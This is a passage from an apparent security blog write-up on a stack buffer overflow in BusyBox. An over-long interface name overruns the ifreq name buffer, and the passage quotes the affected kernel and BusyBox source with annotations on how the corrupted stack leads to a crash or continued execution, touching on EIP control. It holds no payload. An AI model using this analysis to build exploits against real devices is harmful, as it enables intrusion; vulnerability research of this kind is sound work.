IOCTL we&#8217;ll land here &#8211; direct EIP control*\/<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0039 seconds] -->  <\/p>\n<p>Arbitrary length (may be limited by os) string <code>IFNAME<\/code> overwrites 16 bytes fixed buffer <code>ifreq.ifr_name[IFANMESIZ]<\/code> [5,6].<\/p>\n<p>4. stack is messed up before IOCTL for SIOCGIFHWADDR in ioctl_or_perror_and_die<\/p>\n<p>We control any fields below <code>ifr.ifr_name<\/code> &#8211; which essentially is any ifreq field, see below &#8211; allowing us to call <code>SIOCGIFHWADDR IOCTL<\/code> with user controlled fields and pot. let it die or make it succeed. If the <code>IOCTL<\/code> fails it will make the process die in <code>vsprintf()<\/code> due to messed up va_args on stack. If the <code>IOCT<\/code>L succeeds, it will make the process continue, copy taken from [5]<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ec288f90510316871\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \t\t203 struct ifreq {  \t\t204 #define IFHWADDRLEN     6  \t\t205         union  \t\t206         {  \t\t207                 char    ifrn_name[IFNAMSIZ];            \/* if name, e.g. &#8220;en0&#8221; *\/  \/** !! we overflow here *\/  \t\t208         } ifr_ifrn;  \t\t209           \t\t210         union {  \t\t211                 struct  sockaddr ifru_addr;  \t\t212                 struct  sockaddr ifru_dstaddr;  \t\t213                 struct  sockaddr ifru_broadaddr;  \t\t214                 struct  sockaddr ifru_netmask;  \t\t215                 struct  sockaddr ifru_hwaddr;  \t\t216                 short   ifru_flags;  \t\t217                 int     ifru_ivalue;  \t\t218                 int     ifru_mtu;  \t\t219                 struct  ifmap ifru_map;  \t\t220                 char    ifru_slave[IFNAMSIZ];   \/* Just fits the size *\/  \t\t221                 char    ifru_newname[IFNAMSIZ];  \t\t222                 void __user *   ifru_data;  \t\t223                 struct  if_settings ifru_settings;  \t\t224         } ifr_ifru;  \t\t225 };<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f90510316871-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f90510316871-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f90510316871-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f90510316871-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f90510316871-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f90510316871-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f90510316871-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f90510316871-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f90510316871-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f90510316871-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f90510316871-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f90510316871-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f90510316871-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f90510316871-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f90510316871-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f90510316871-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f90510316871-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f90510316871-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f90510316871-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f90510316871-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f90510316871-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f90510316871-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f90510316871-23\">23<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ec288f90510316871-1\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">203<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ifreq<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f90510316871-2\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">204<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#define IFHWADDRLEN&nbsp;&nbsp;&nbsp;&nbsp; 6<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f90510316871-3\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">205<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">union<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f90510316871-4\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">206<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f90510316871-5\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">207<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ifrn_name<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">IFNAMSIZ<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/* if name, e.g. &#8220;en0&#8221; *\/<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/** !! we overflow here *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f90510316871-6\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">208<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ifr_ifrn<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f90510316871-7\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">209<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f90510316871-8\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">210<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">union<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f90510316871-9\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">211<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">sockaddr <\/span><span class=\"crayon-v\">ifru_addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f90510316871-10\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">212<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">sockaddr <\/span><span class=\"crayon-v\">ifru_dstaddr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f90510316871-11\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">213<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">sockaddr <\/span><span class=\"crayon-v\">ifru_broadaddr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f90510316871-12\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">214<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">sockaddr <\/span><span class=\"crayon-v\">ifru_netmask<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f90510316871-13\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">215<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">sockaddr <\/span><span class=\"crayon-v\">ifru_hwaddr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f90510316871-14\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">216<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">short<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">ifru_flags<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f90510316871-15\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">217<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">ifru_ivalue<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f90510316871-16\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">218<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">ifru_mtu<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f90510316871-17\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">219<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">ifmap <\/span><span class=\"crayon-v\">ifru_map<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f90510316871-18\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">220<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ifru_slave<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">IFNAMSIZ<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/* Just fits the size *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f90510316871-19\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">221<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ifru_newname<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">IFNAMSIZ<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f90510316871-20\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">222<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">__user *<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">ifru_data<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f90510316871-21\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">223<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">if_settings <\/span><span class=\"crayon-v\">ifru_settings<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f90510316871-22\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">224<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ifr_ifru<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f90510316871-23\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-cn\">225<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0029 seconds] -->  <\/p>\n<p>5. a) IOCTL fails<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ec288f93990116890\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \t\t\/\/xfuncs_printf.c:508  \t\t  \t\tint FAST_FUNC ioctl_or_perror_and_die(int fd, unsigned request, void *argp, const char *fmt,&#8230;)  \t\t{  \t\t\tint ret;  \t\t\tva_list p;\t\t\t\t\t\t\t\t\t\t\t\t\t\/** !! stack is messed up *\/  \t\t  \t\t\tret = ioctl(fd, request, argp);  \t\t\tif (ret &lt; 0) {  \t\t\t\tva_start(p, fmt);  \t\t\t\tbb_verror_msg(fmt, p, strerror(errno));\t\t\t\t\t\/** !! valist p is corrupt, stack is messed up, and we fail, printing error*\/  \t\t\t\t\/* xfunc_die can actually longjmp, so be nice *\/  \t\t\t\tva_end(p);  \t\t\t\txfunc_die();  \t\t\t}  \t\t\treturn ret;  \t\t}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f93990116890-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f93990116890-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f93990116890-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f93990116890-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f93990116890-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f93990116890-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f93990116890-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f93990116890-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f93990116890-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f93990116890-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f93990116890-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f93990116890-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f93990116890-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f93990116890-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f93990116890-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f93990116890-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f93990116890-17\">17<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ec288f93990116890-1\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-c\">\/\/xfuncs_printf.c:508<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f93990116890-2\"><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f93990116890-3\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">FAST_FUNC <\/span><span class=\"crayon-e\">ioctl_or_perror_and_die<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">argp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">fmt<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f93990116890-4\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f93990116890-5\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ret<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f93990116890-6\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-v\">va<\/span><span class=\"crayon-sy\">_<\/span>list<span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span><span class=\"crayon-c\">\/** !! stack is messed up *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f93990116890-7\"><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f93990116890-8\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-v\">ret<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ioctl<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argp<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f93990116890-9\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ret<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f93990116890-10\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">va_start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fmt<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f93990116890-11\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">bb_verror_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fmt<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strerror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">errno<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-c\">\/** !! valist p is corrupt, stack is messed up, and we fail, printing error*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f93990116890-12\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-c\">\/* xfunc_die can actually longjmp, so be nice *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f93990116890-13\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">va_end<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span 